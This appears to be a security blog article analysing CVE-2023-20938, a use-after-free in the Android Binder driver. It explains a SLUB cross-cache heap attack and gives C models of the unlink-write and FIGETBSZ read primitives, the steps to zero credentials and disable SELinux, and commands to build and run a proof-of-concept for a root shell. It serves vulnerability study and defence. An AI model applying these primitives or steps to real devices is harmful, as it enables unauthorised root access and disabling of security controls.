
Introduction:
The Linux kernel’s SLUB allocator is designed for performance, but its per-type caches also create a distinctive challenge for exploit developers. When a use-after-free (UAF) occurs, the freed object and the target object you want to corrupt usually live in different dedicated caches, so the usual same-cache reclamation techniques do not apply. Bridging that gap calls for a “cross-cache” attack: the attacker forces the allocator to hand the page holding the freed object back to the buddy allocator, then has that same page reallocated to a different, higher-value object type. This article provides a deep dive into CVE-2023-20938, a local privilege escalation (LPE) vulnerability in the Android Binder driver, covering the mechanics of the cross-cache attack and how Google’s Android Red Team turned the bug into a working exploit.
Learning Objectives:
- Understand the root cause of CVE-2023-20938 and how improper input validation in the Binder driver leads to a use-after-free condition.
- Comprehend the mechanics of a cross-cache attack, including how an attacker can exhaust a SLUB cache and manipulate the buddy allocator.
- Analyze the step-by-step exploitation chain, from achieving a leak primitive to escalating privileges and disabling SELinux.
You Should Know:
1. The Vulnerability: A Binder Transaction Gone Wrong
The bug resides in `binder_transaction_buffer_release()` in the Android Binder driver (drivers/android/binder.c), the cleanup routine that drops the references a transaction took on the objects embedded in it. It is reached with a crafted transaction whose `offsets_size` is one byte short of a full offset entry (sizeof(binder_size_t) - 1 == 7). The transaction fails validation before any of its objects has been processed, yet the release path still walks the offsets array, parses the trailing flat_binder_object and decrements the reference count of the `binder_node` it names. Because no reference was ever taken on that node, this is an over-decrement: the node is freed while a dangling reference to it remains live inside the kernel, a classic use-after-free. The vulnerability affected Android devices running GKI kernel versions 5.4 and 5.10.
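The following is an added example, not code from the page, the proof-of-concept or the kernel sources: a user-space model of the cleanup loop in `binder_transaction_buffer_release()`, run once with an end-offset rule shaped like the affected code (an early failure reports `failed_at == 0`, which the ternary treats as "no limit") and once with a rule that carries the intent of the fix (on failure, `failed_at` is authoritative, so 0 releases nothing). Structure layouts, the `failed_at == 0` assumption and the "fixed" rule are all modelling assumptions; only the `BINDER_TYPE_BINDER` tag value is the real one.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model, not kernel code: layouts are reduced to what the cleanup loop touches. */

#define BINDER_TYPE_BINDER 0x73622a85u   /* real tag value; everything else is a model */

/* The modelled binder_node only tracks a strong-reference count. */
struct model_node {
    int  strong;
    bool freed;     /* set when the count reaches zero (kfree in the kernel) */
};

/* Simplified flat_binder_object: type tag plus the node it refers to. */
struct model_fbo {
    uint32_t type;
    uint32_t flags;
    struct model_node *node;
};

/* Transaction buffer: payload first, offsets array at ALIGN(data_size, 8). */
struct model_buffer {
    size_t  data_size;
    size_t  offsets_size;   /* attacker-supplied; need not be a multiple of 8 */
    uint8_t data[64];
};

static size_t align8(size_t v) { return (v + 7) & ~(size_t)7; }

static void dec_node(struct model_node *n)
{
    if (--n->strong <= 0)
        n->freed = true;    /* node is gone; any remaining reference now dangles */
}

/* Walk [off_start, off_end) in 8-byte steps and drop one reference per
 * BINDER_TYPE_BINDER object. The offset is read as a full 8-byte value even
 * when fewer bytes were copied from user space. */
static void release_objects(const struct model_buffer *b, size_t off_start, size_t off_end)
{
    for (size_t off = off_start; off < off_end; off += sizeof(uint64_t)) {
        uint64_t obj_off;
        struct model_fbo fbo;

        memcpy(&obj_off, b->data + off, sizeof obj_off);
        memcpy(&fbo, b->data + obj_off, sizeof fbo);
        if (fbo.type == BINDER_TYPE_BINDER)
            dec_node(fbo.node);
    }
}

/* Vulnerable rule (assumed shape): failed_at == 0 on an early failure is taken
 * as "no limit", so every object in the buffer is released. */
static size_t end_offset_vulnerable(const struct model_buffer *b, size_t failed_at, bool is_failure)
{
    return (is_failure && failed_at) ? failed_at : align8(b->data_size) + b->offsets_size;
}

/* Fixed rule (intent of the fix, not its literal diff): on failure, failed_at is
 * authoritative, so 0 means nothing was processed and nothing is released. */
static size_t end_offset_fixed(const struct model_buffer *b, size_t failed_at, bool is_failure)
{
    return is_failure ? failed_at : align8(b->data_size) + b->offsets_size;
}

/* Build the transaction the text describes: one flat_binder_object at data
 * offset 0 naming `node`, then a 7-byte offsets array (one byte short of an
 * entry). Validation fails before any object is processed, so cleanup runs
 * with failed_at == 0 and is_failure == true. Returns the node's reference
 * count afterwards and reports whether it was freed. */
static int simulate_early_failure(bool fixed, bool *freed)
{
    struct model_node node = { .strong = 1, .freed = false };   /* one legitimate holder */
    struct model_fbo fbo = { .type = BINDER_TYPE_BINDER, .flags = 0, .node = &node };
    struct model_buffer b;
    size_t off_start, off_end;

    memset(&b, 0, sizeof b);
    memcpy(b.data, &fbo, sizeof fbo);
    b.data_size = sizeof fbo;     /* 16 bytes, already 8-aligned */
    b.offsets_size = 7;           /* fails IS_ALIGNED(offsets_size, 8) */
    /* 7 bytes copied from user: offset 0 (the object above); the 8th byte is
     * whatever the buffer already held, zero in this model. */
    memset(b.data + align8(b.data_size), 0, b.offsets_size);

    off_start = align8(b.data_size);
    off_end = fixed ? end_offset_fixed(&b, 0, true)
                    : end_offset_vulnerable(&b, 0, true);
    release_objects(&b, off_start, off_end);

    *freed = node.freed;
    return node.strong;
}

int main(void)
{
    bool freed;
    int refs = simulate_early_failure(false, &freed);
    printf("vulnerable: refs=%d freed=%d\n", refs, freed);   /* refs=0 freed=1 */
    refs = simulate_early_failure(true, &freed);
    printf("fixed:      refs=%d freed=%d\n", refs, freed);   /* refs=1 freed=0 */
    return 0;
}
```

The point the model makes is that the single unaligned entry still yields one loop iteration (16 < 23), and that the decrement lands on a node that was never incremented by this transaction, so a node with one legitimate holder drops to zero and is freed while that holder's reference still exists.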
2. The Cross-Cache Attack: Bypassing the SLUB Allocator
Unlike a general-purpose userspace heap, where a freed chunk is reused for whatever comes next of a similar size, the Linux kernel’s SLUB allocator keeps dedicated caches (`kmem_cache`) per object type or size class, each with its own slab pages and freelists. The freed `binder_node` lives in the `kmalloc-128` cache, while the objects the attacker wants to corrupt, such as a `struct file` (`filp` cache) or an `epitem` (`eventpoll_epi` cache), are allocated from different caches and so never share a slab page with it.
To bridge this gap, the exploit uses a cross-cache attack. The steps are as follows:
1. Shape the Heap: Before triggering the bug, allocate enough `kmalloc-128` objects (other Binder nodes work well) to drain the partial slabs, so that the `binder_node` to be freed lands on a fresh slab surrounded by attacker-controlled objects.
2. Free the Vulnerable Object: Trigger the UAF, freeing the `binder_node` while a dangling reference to it remains.
3. Empty and Discard the Slab: Free every other object on that slab so it becomes completely empty, then free enough further objects that SLUB’s per-CPU and per-node partial lists are over their thresholds. SLUB only returns a completely free slab to the buddy allocator when it cannot keep it on a partial list, so this is the step that actually hands the page back.
4. Reallocate the Page: Allocate many objects from the target cache, for example `epitem` objects (0x80 bytes, `eventpoll_epi` cache) by registering file descriptors with epoll. When the target cache needs a new slab, the buddy allocator is likely to hand out the page it just received, overlaying fresh `epitem` objects onto the memory of the freed `binder_node`.
Now the dangling `binder_node` reference and a freshly allocated `epitem` refer to the same physical memory. Binder operations on the stale node read and write the `epitem`’s fields, and epoll operations on the `epitem` are visible through the stale node; this overlay is the primitive the rest of the chain builds on.
3. Building the Exploit Chain: From Leak to Root
The public proof-of-concept for CVE-2023-20938 chains several primitives to reach root.
- Leak Primitive: By re-triggering the UAF with an `epitem` overlaid on the freed `binder_node`, the exploit reads kernel pointers out of the `epitem` through the stale node. This leaks the address of a `struct file` and of the `epitem` itself, giving the exploit known heap addresses to build on; the KASLR slide for kernel text follows once the read primitive below can follow pointers out of these objects.
- Arbitrary Write and Arbitrary Read: Using the leaked addresses, the exploit crafts a fake `binder_node` at a known location. Re-triggering the UAF with this fake node turns the kernel’s `hlist_del` unlink on it into a controlled write (`*where = what`, with the side effect that `what + 8` is also written, so `what` must point at writable memory). The write redirects a victim `file` object’s `f_inode` pointer to a fake inode overlaid on the `epitem`. An `ioctl` with the `FIGETBSZ` command on that file then returns `inode->i_sb->s_blocksize`, so pointing the fake inode’s `i_sb` at an attacker-chosen address yields a steerable 4-byte arbitrary read.
- Privilege Escalation: With arbitrary read and write in hand, the exploit walks the kernel’s task list from `init_task` to find its own task and its credentials (`struct cred`). It zeroes the UID and GID values, granting root, then locates and zeroes the `selinux_state.enforcing` flag, dropping SELinux to permissive mode, and spawns a root shell.
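The following is an added example, not code from the page or the proof-of-concept: a user-space model of the two primitives described above, the `hlist_del` unlink write and the `FIGETBSZ` read through a redirected `f_inode`. The unlink arithmetic is the kernel's own `__hlist_del` semantics; the `inode`, `super_block` and `file` layouts are reduced to the fields the primitives touch and their offsets are modelling assumptions, not the real kernel offsets.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Model, not kernel code: only the fields the primitives touch are present. */

struct hlist_node {
    struct hlist_node *next, **pprev;
};

/* The same two stores as the kernel's __hlist_del(). The first is the
 * "*where = what" write; the second stores pprev into what + 8, so `what`
 * must be NULL or point at memory the attacker can afford to have written. */
static void model_hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    *pprev = next;
    if (next)
        next->pprev = pprev;
}

/* Drive the unlink from an attacker-controlled node (in the exploit, the fake
 * binder_node overlaid on the freed slot) to store `what` at `where`. */
static void unlink_write(void **where, void *what)
{
    struct hlist_node fake = {
        .next  = (struct hlist_node *)what,
        .pprev = (struct hlist_node **)where,
    };
    model_hlist_del(&fake);
}

struct model_super_block {
    unsigned long s_blocksize;   /* the one field FIGETBSZ reads */
};

struct model_inode {
    uint64_t word0;
    uint64_t word1;              /* offset 8: clobbered by the unlink's second store */
    struct model_super_block *i_sb;
};

struct model_file {
    struct model_inode *f_inode;
};

/* do_vfs_ioctl(FIGETBSZ) hands inode->i_sb->s_blocksize back to user space as an int. */
static int model_figetbsz(const struct model_file *f)
{
    return (int)f->f_inode->i_sb->s_blocksize;
}

/* Aim the fake inode's i_sb so that s_blocksize overlays `target`, swing the
 * victim file's f_inode onto the fake inode with the unlink write, then
 * "ioctl". Returns the low 32 bits of the 8-byte word at `target`. */
static int read32_via_figetbsz(struct model_file *victim, struct model_inode *fake,
                               const void *target)
{
    uintptr_t sb = (uintptr_t)target - offsetof(struct model_super_block, s_blocksize);

    fake->i_sb = (struct model_super_block *)sb;
    unlink_write((void **)&victim->f_inode, fake);   /* also writes fake->word1 */
    return model_figetbsz(victim);
}

/* Demo: leak the low half of a "kernel" value the attacker cannot read directly. */
static unsigned demo_leak(void)
{
    uint64_t secret = 0x1122334455667788ULL;
    struct model_inode fake = { 0 };
    struct model_file victim = { .f_inode = NULL };

    return (unsigned)read32_via_figetbsz(&victim, &fake, &secret);   /* 0x55667788 */
}

int main(void)
{
    printf("FIGETBSZ leaked 0x%08x\n", demo_leak());
    return 0;
}
```

Two details worth carrying over to the real thing: the unlink's second store lands at offset 8 of whatever `what` points to, so the fake inode must be laid out such that the field at that offset is one `FIGETBSZ` does not consult, and the read returns only the low 32 bits of an 8-byte load, so leaking a full pointer takes two reads at `target` and `target + 4`.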
4. Step-by-Step Guide: Reproducing the Exploit
For educational purposes, the exploit can be reproduced against a vulnerable Cuttlefish virtual device. This must only be performed in an isolated, authorized test environment.
1. Setup: Obtain a vulnerable Android Cuttlefish image running kernel version 5.10.107.
2. Build: Compile the proof-of-concept (`poc_cf.c`) with `clang -static -Wall -Wextra -o poc_cf poc_cf.c -lpthread`. A static binary avoids depending on the device’s libc.
3. Deploy: Push the binary with `adb push poc_cf /data/local/tmp/`.
4. Execute: Run it from the unprivileged `shell` user: `adb shell /data/local/tmp/poc_cf`. A successful run drops into a root shell; `id` should report `uid=0(root)` and `getenforce` should report `Permissive`.
5. Mitigations and Defense in Depth
Modern Android kernels ship several mitigations that make slab corruption and cross-cache attacks harder, though none of them prevents a freed slab page from being reused by another cache:
- CONFIG_SLAB_FREELIST_HARDENED: XORs the freelist pointer stored in each free object with a per-cache secret and the object’s address, and checks for double frees on the fast path, so a corrupted or forged freelist pointer cannot be used to steer allocations.
- CONFIG_SLAB_FREELIST_RANDOM: Randomizes the order in which a fresh slab’s objects are handed out, making it harder to predict which slot a given allocation will land in.
- SLAB_ACCOUNT: Marks caches such as `eventpoll_epi` as memcg-accounted; with the separate `kmalloc-cg-*` caches of kernels 5.14 and later, accounted and unaccounted allocations no longer share slab pages, which removes some same-cache overlay options but not the buddy-allocator round trip that cross-cache attacks rely on.
– Patch for CVE-2023-20938: The vulnerability was patched by Google in the February 2023 and July 2023 Android Security Bulletins.
6. Commands and Code Snippets
- Trigger the UAF (conceptual): send a Binder transaction whose `offsets_size` is 7.
- Heap spray (conceptual): open many Binder nodes and file descriptors to shape and exhaust the `kmalloc-128` cache, then register file descriptors with epoll to spray `epitem` objects over the freed page.
- Build command: `clang -static -Wall -Wextra -o poc_cf poc_cf.c -lpthread`
- Run command: `adb shell /data/local/tmp/poc_cf`
What Undercode Say:
- Key Takeaway 1: CVE-2023-20938 is an exemplary case study demonstrating that modern kernel exploitation is not just about finding a bug, but about mastering the intricacies of the memory allocator and the kernel’s internal structures to build a reliable exploit chain.
- Key Takeaway 2: The cross-cache attack is a powerful technique that effectively bypasses the isolation provided by the SLUB allocator, allowing an attacker to turn a limited UAF in one cache into a full LPE.
- Analysis: The exploit’s complexity highlights the importance of a deep understanding of kernel internals, including the Binder driver, SLUB allocator, and various mitigation techniques. The Android Red Team’s decision to publish the full chain, including the cross-cache primitive and heap shaping techniques, is a significant contribution to the security community. It provides a rare, end-to-end view of how advanced exploitation techniques are applied in the real world, constrained by KASLR, SLUB hardening, and per-CPU partial lists. This transparency empowers researchers and defenders alike to better understand and mitigate such threats. The existence of public proof-of-concept code further underscores the critical need for timely patching.
Prediction:
- -1: The sophistication of cross-cache attacks will continue to evolve, with researchers developing new techniques like SLUBStick to achieve over 99% success rates on generic caches, further challenging current mitigations.
- -1: As Android devices become more prevalent in enterprise and critical infrastructure, the impact of such LPE vulnerabilities will grow, making them a prime target for advanced persistent threat (APT) groups and commercial surveillance vendors.
- +1: The security community’s proactive approach, including detailed disclosures from Google’s Android Red Team and the availability of proof-of-concept exploits for research, will accelerate the development of more robust kernel hardening and detection mechanisms, ultimately making the Android ecosystem more resilient.
Reported By: Pallis Been – Hackers Feeds